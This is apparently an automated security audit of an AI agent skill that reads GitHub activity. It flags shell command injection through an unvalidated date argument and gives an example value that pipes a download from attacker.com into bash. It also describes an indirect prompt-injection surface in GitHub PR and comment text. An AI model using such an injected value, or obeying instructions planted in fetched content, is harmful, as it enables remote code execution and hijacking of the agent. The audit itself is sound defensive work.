read-github-activity

Warn

Audited by Gen Agent Trust Hub on May 13, 2026

Risk Level: MEDIUM (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • [COMMAND_EXECUTION]: The SKILL.md file defines a shell command that interpolates a variable directly into a bash call: bash $SKILL/scripts/fetch-github-activity.sh {date}. If the {date} input provided by a user or another agent is not strictly validated or escaped by the platform before interpolation, it could lead to arbitrary command execution on the host system (e.g., using a value like 2024-01-01; curl attacker.com/payload | bash). While the script scripts/fetch-github-activity.sh contains internal date validation, this check occurs after the shell has already parsed the command line, meaning it does not prevent injection at the invocation stage.
  • [PROMPT_INJECTION]: The skill exposes a surface for indirect prompt injection by ingesting untrusted data from GitHub and presenting it to the agent without sufficient safeguards.
      • Ingestion points: PR titles, body snippets, and comment bodies are fetched from the GitHub API within scripts/fetch-github-activity.sh.
      • Boundary markers: Absent. The instructions in SKILL.md do not use delimiters or include explicit instructions for the agent to ignore potential instructions embedded in the external data.
      • Capability inventory: The skill has the ability to execute shell commands (bash), interact with the GitHub CLI (gh), and process JSON (jq).
      • Sanitization: The script uses jq to structure the output and truncates text fields to specific lengths, but it does not sanitize the content of those fields for natural language instructions or malicious prompts.
Audit Metadata
Risk Level: MEDIUM
Analyzed: May 13, 2026, 06:33 PM